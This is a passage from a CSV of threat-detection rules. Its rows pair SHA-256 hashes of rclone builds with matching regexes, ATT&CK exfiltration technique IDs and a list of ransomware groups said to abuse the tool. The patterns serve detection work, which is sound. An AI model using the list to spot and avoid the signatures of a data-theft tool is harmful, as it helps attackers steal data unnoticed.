services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*3731a5ba51666d673e03442e09d34b68b9afe2b629c5adfd279b13c43da69ea6*",".{0,1000}3731a5ba51666d673e03442e09d34b68b9afe2b629c5adfd279b13c43da69ea6.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*37349352fd09ebb634460449aa308f2bbb399349fe208c6cf3d1da9bfa9c6542*",".{0,1000}37349352fd09ebb634460449aa308f2bbb399349fe208c6cf3d1da9bfa9c6542.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*378a4fd9f3fc47d51413ba48e31a275c972a9e31f3483d46c196ab26f8f1d7e7*",".{0,1000}378a4fd9f3fc47d51413ba48e31a275c972a9e31f3483d46c196ab26f8f1d7e7.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*378e780acaaf2fe122d76ac501684d9e82ec880c466c61a6d28b463fd18e7ae6*",".{0,1000}378e780acaaf2fe122d76ac501684d9e82ec880c466c61a6d28b463fd18e7ae6.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*37b1e2141c2d5c0d7d65637a4694fe0707c46acfb7dd19307c2d7629a3045aad*",".{0,1000}37b1e2141c2d5c0d7d65637a4694fe0707c46acfb7dd19307c2d7629a3045aad.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*37d6f27953cdc681076bc90bfb4e4acaf882a75cc11a39c4ba4749087f819796*",".{0,1000}37d6f27953cdc681076bc90bfb4e4acaf882a75cc11a39c4ba4749087f819796.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*380df39f172e53d4749d9cb0db5334901ac6e342c193e5c23b0c8147f068a1c1*",".{0,1000}380df39f172e53d4749d9cb0db5334901ac6e342c193e5c23b0c8147f068a1c1.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*3877bed52de5a213bb2ca2d6bf94f63819eb5e8864fb589c083cde736dc95e16*",".{0,1000}3877bed52de5a213bb2ca2d6bf94f63819eb5e8864fb589c083cde736dc95e16.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*3880d59cbdb217668d95c8aba770bf9a96338f159ecbd140e3aaaabd8cac583a*",".{0,1000}3880d59cbdb217668d95c8aba770bf9a96338f159ecbd140e3aaaabd8cac583a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*3883b30618c5e6fc1c413969f6172d5dd3cbbdb675cc26559a837181e6cfcc94*",".{0,1000}3883b30618c5e6fc1c413969f6172d5dd3cbbdb675cc26559a837181e6cfcc94.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*3892be4225abb7e205c7603577da120277af2a7d2ccba47cea239ae20f1b78d3*",".{0,1000}3892be4225abb7e205c7603577da120277af2a7d2ccba47cea239ae20f1b78d3.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*38a5a54c12beb19883e6bcd33ddfba7894df01fd2869599d84efc784d1d6cc35*",".{0,1000}38a5a54c12beb19883e6bcd33ddfba7894df01fd2869599d84efc784d1d6cc35.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*38a98cc77a24b59f8f7c9fb34901dc655ce7296aebd865aee48fb5f33c953f9e*",".{0,1000}38a98cc77a24b59f8f7c9fb34901dc655ce7296aebd865aee48fb5f33c953f9e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*38cc200f3ba7b488ee7e629feb9621064e5681396edb70282f3daf3d09d4c3c7*",".{0,1000}38cc200f3ba7b488ee7e629feb9621064e5681396edb70282f3daf3d09d4c3c7.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*38d9cd1b16698848ef5e7bf46d6469b63b3ff61f4a5cafb4ce8937b3995b35f9*",".{0,1000}38d9cd1b16698848ef5e7bf46d6469b63b3ff61f4a5cafb4ce8937b3995b35f9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*390e1635b9a3a704a9bc3e252316898f1a61ec6c3c6b65114fbccceacaaa8db8*",".{0,1000}390e1635b9a3a704a9bc3e252316898f1a61ec6c3c6b65114fbccceacaaa8db8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*39af973b5bd6a20c70101c2e5c2b394985d0c3f043c64c24de4c1cc8546b03c6*",".{0,1000}39af973b5bd6a20c70101c2e5c2b394985d0c3f043c64c24de4c1cc8546b03c6.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*3a1456c9405163b1ad8cdee71e82752fdf5ab2c8004c36d8d86134ebb90d212e*",".{0,1000}3a1456c9405163b1ad8cdee71e82752fdf5ab2c8004c36d8d86134ebb90d212e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*3a21f457d1ab0c317b828b68937b74dc4b4229d3613c1c04ef20123960bfe379*",".{0,1000}3a21f457d1ab0c317b828b68937b74dc4b4229d3613c1c04ef20123960bfe379.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*3a5163c77da1011ace25120f77a4ec0932cc66d18f6fc1fc4f2470f7877ff2ea*",".{0,1000}3a5163c77da1011ace25120f77a4ec0932cc66d18f6fc1fc4f2470f7877ff2ea.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*3a671bd31450b20b6288c5334a1259e37e314713fbc031b1c44f11b78d8de6cd*",".{0,1000}3a671bd31450b20b6288c5334a1259e37e314713fbc031b1c44f11b78d8de6cd.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*3a762c02c202a9142c2d5c1a3927563a556d1683abadd25d2f695e237e4ea693*",".{0,1000}3a762c02c202a9142c2d5c1a3927563a556d1683abadd25d2f695e237e4ea693.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*3ab9418d217a75325f9e75c5b9cf0aa7d41678edad25d1a2d6a64cba75f81b2e*",".{0,1000}3ab9418d217a75325f9e75c5b9cf0aa7d41678edad25d1a2d6a64cba75f81b2e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*3acd2648aa3fcdfdaa9fbcfb4afbf00749b641657822db80dae66783cbc3e1a9*",".{0,1000}3acd2648aa3fcdfdaa9fbcfb4afbf00749b641657822db80dae66783cbc3e1a9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*3b0d7d1a140835725d11b4044a9f83f76b9b02281d2b907b16255d73ccdccaab*",".{0,1000}3b0d7d1a140835725d11b4044a9f83f76b9b02281d2b907b16255d73ccdccaab.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*3b39b4f2bc0e474051c15ec7f110d9087f096107096913f2672ef8fd4f2ecfb6*",".{0,1000}3b39b4f2bc0e474051c15ec7f110d9087f096107096913f2672ef8fd4f2ecfb6.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*3b86cb342175e34a6bd96c020a73c0b368572c894b2e6f4dfcac234c58449e22*",".{0,1000}3b86cb342175e34a6bd96c020a73c0b368572c894b2e6f4dfcac234c58449e22.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*3bae7cc19b18dfc427e61c4e42c03c4a77ace51552c2583b644b7fa89380776c*",".{0,1000}3bae7cc19b18dfc427e61c4e42c03c4a77ace51552c2583b644b7fa89380776c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*3bb03c08f11fda276c953544487558c3c0bfe14f89796b9eaa108a334d854ed1*",".{0,1000}3bb03c08f11fda276c953544487558c3c0bfe14f89796b9eaa108a334d854ed1.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*3bf56844b1e6391473d1e6758622840471eac1e24c36eacfcde1aca27eadb810*",".{0,1000}3bf56844b1e6391473d1e6758622840471eac1e24c36eacfcde1aca27eadb810.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*3c217d484b2d801274b135b11ea010a3084a25943735e7a1e153f6acfe8659f3*",".{0,1000}3c217d484b2d801274b135b11ea010a3084a25943735e7a1e153f6acfe8659f3.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*3c6f9fec7bf83c71b2ac9fbcea0f30ab0aaf949bf53b70e8ec12413bc059911a*",".{0,1000}3c6f9fec7bf83c71b2ac9fbcea0f30ab0aaf949bf53b70e8ec12413bc059911a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*3c8b4049525d16bfe42738bf74f2d264fc18499397e46e907d1214a39bea21dd*",".{0,1000}3c8b4049525d16bfe42738bf74f2d264fc18499397e46e907d1214a39bea21dd.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*3c9ce97365381994fdf43d5f68c87af7c656334556fae7fa066a037efef3d743*",".{0,1000}3c9ce97365381994fdf43d5f68c87af7c656334556fae7fa066a037efef3d743.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*3cb6b58557fd8452c97f46484d284d61d86586b007b4cee7ca1f3ccb43c06951*",".{0,1000}3cb6b58557fd8452c97f46484d284d61d86586b007b4cee7ca1f3ccb43c06951.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*3cedfcd57d1096bfc0c7469e8e356e13b999a338214dd610063f8abee6d80873*",".{0,1000}3cedfcd57d1096bfc0c7469e8e356e13b999a338214dd610063f8abee6d80873.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - 